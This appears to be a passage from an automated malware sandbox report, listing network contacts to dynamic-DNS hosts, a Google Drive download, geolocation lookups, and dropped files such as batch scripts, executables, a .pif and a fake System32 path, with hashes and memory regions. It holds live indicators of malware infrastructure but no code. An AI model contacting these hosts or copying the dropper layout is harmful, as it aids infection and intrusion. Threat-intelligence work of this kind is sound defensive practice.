US 191.101.130.5:80 madibarohillafour.duckdns.org tcp
US 191.101.130.5:80 madibarohillafour.duckdns.org tcp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 216.58.201.97:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 97.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 cxcs.microsoft.net udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 myfrontmannysix.ddns.net udp
CA 199.189.26.138:4939 myfrontmannysix.ddns.net tcp
US 8.8.8.8:53 138.26.189.199.in-addr.arpa udp
CA 199.189.26.138:4939 myfrontmannysix.ddns.net tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 52.111.227.14:443 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 150.171.28.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.28.171.150.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\VMXFQD.bat

MD5 e738497b75feb03a11e7b7e763f51037
SHA1 08c5205a67595a5c9e29341d03b6b66da96528e1
SHA256 897173be3c5e872e2d8560f8df743f93c8eb857f8d2d22d3196343c35e90abac
SHA512 3f1812c950e37b3048209e2abdecdfd40650541eefe9722f35771e7fc5723f409dbcffff7325421418948666c312165fa3f182ab3eb5fa442bbee46cb43118bc

C:\Users\Public\alpha.exe

MD5 8a2122e8162dbef04694b9c3e0b6cdee
SHA1 f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256 b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA512 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397

C:\Users\Public\kn.exe

MD5 bd8d9943a9b1def98eb83e0fa48796c2
SHA1 70e89852f023ab7cde0173eda1208dbb580f1e4f
SHA256 8de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA512 95630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b

C:\Users\Public\CLEAN.GIF

MD5 7b55805a9a2ffab38db59819b5c5c274
SHA1 65996c765dfc6a7665c8835edbf1bc4e7a1c9502
SHA256 50a94c852a9b0ba9f6ca217dfa79652b48a2ac41fe2b4578faad2e8e4a95800a
SHA512 3ac6a88d062cb076feb0b3397d12c61b8575763c9bb245d92b2d0b44b10451948a1d284244870c23e4e104575f3ccd09e0e0c7ee43e888a13f384ef1444fa2fb

C:\Users\Public\Libraries\CLEAN.COM

MD5 beacddde34cecf28562a676b781d71e4
SHA1 58ee38081e67d99f494248d682ce907921b1e020
SHA256 80091724af78d5cfdcb8a3a57eaf479f2a49b3479d69e4043a4bef74d0f5ae0b
SHA512 75df3ece32221eea5ec75ec5ff58d9484f6d317c2a55a04fb811a4f25409fd1761077df8e920dd683b9f3d37233f6d1e21e3e06e2a47a6539625d23ae05c83b1

memory/1328-33-0x0000000000400000-0x00000000004F8000-memory.dmp

C:\Users\Public\Libraries\nasppvoG.pif

MD5 c116d3604ceafe7057d77ff27552c215
SHA1 452b14432fb5758b46f2897aeccd89f7c82a727d
SHA256 7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301
SHA512 9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

memory/3556-40-0x0000000000400000-0x0000000001400000-memory.dmp

memory/3556-42-0x0000000000400000-0x000000000041A000-memory.dmp

memory/3556-37-0x0000000000400000-0x0000000001400000-memory.dmp

memory/3556-43-0x0000000000400000-0x0000000001400000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1D28.tmp\1D29.tmp\1D2A.bat

MD5 e62f427202d3e5a3ba60ebe78567918c
SHA1 6ef0cd5ba6c871815fceb27ff095a7931452b334
SHA256 06bee225a830ea0e67b91fd7d24280c5315ef82049b25b07c9cfde4e36a639ff
SHA512 e15148ba4099f3b8c73319be32a5f76226d21e7fb90123bec68e5106d03b7d3e8af8caa0421667920967e8921787ba255dc4bf23d35792bf8e9a20f1e18283c6

C:\Users\Public\xkn.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_toejrzv5.eja.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1476-75-0x000001ECFE9F0000-0x000001ECFEA12000-memory.dmp

C:\Windows \System32\per.exe

MD5 85018be1fd913656bc9ff541f017eacd
SHA1 26d7407931b713e0f0fa8b872feecdb3cf49065a
SHA256 c546e05d705ffdd5e1e18d40e2e7397f186a7c47fa5fc21f234222d057227cf5
SHA512 3e5903cf18386951c015ae23dd68a112b2f4b0968212323218c49f8413b6d508283cc6aaa929dbead853bd100adc18bf497479963dad42dfafbeb081c9035459

memory/3556-100-0x0000000000400000-0x000000000041A000-memory.dmp

memory/3556-98-0x0000000000400000-0x0000000001400000-memory.dmp

memory/1328-106-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-107-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-109-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-108-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-110-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-111-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-113-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/2340-121-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1476-132-0x0000000000400000-0x0000000000424000-memory.dmp

memory/1476-133-0x0000000000430000-0x00000000004F9000-memory.dmp

memory/1476-135-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4616-131-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1476-130-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2340-129-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1476-123-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2340-119-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4616-120-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1476-128-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4616-117-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2340-115-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4616-122-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2340-138-0x0000000000400000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\rrzifaienneuhgtllgiwfpebmdzeowfu

MD5 463b5cfc270ed672e140fc2c1a25aec1
SHA1 23e37a49996b1208888e054fab11aa1e1a81f649
SHA256 2bd023dd922e93f6c6f471751ae97a1fd24a93aa4230e53ac91b8c37dab9b185
SHA512 b0fa0425dc462fa10a56fb28f36b84f3a0e6426922c1fd37e56c4406e713a00aef2bbc04024f06133d1f63960a97372feb32fd4ebf43105b9d9823f37820b4b6

memory/1328-141-0x00000000519A0000-0x00000000519B9000-memory.dmp

memory/1328-145-0x00000000519A0000-0x00000000519B9000-memory.dmp

memory/1328-144-0x00000000519A0000-0x00000000519B9000-memory.dmp

memory/1328-146-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-150-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-149-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-154-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-155-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-160-0x0000000033AF0000-0x0000000034AF0000-memory.dmp

memory/1328-159-0x0000000033AF0000-0x0000000034AF0000-memory.dmp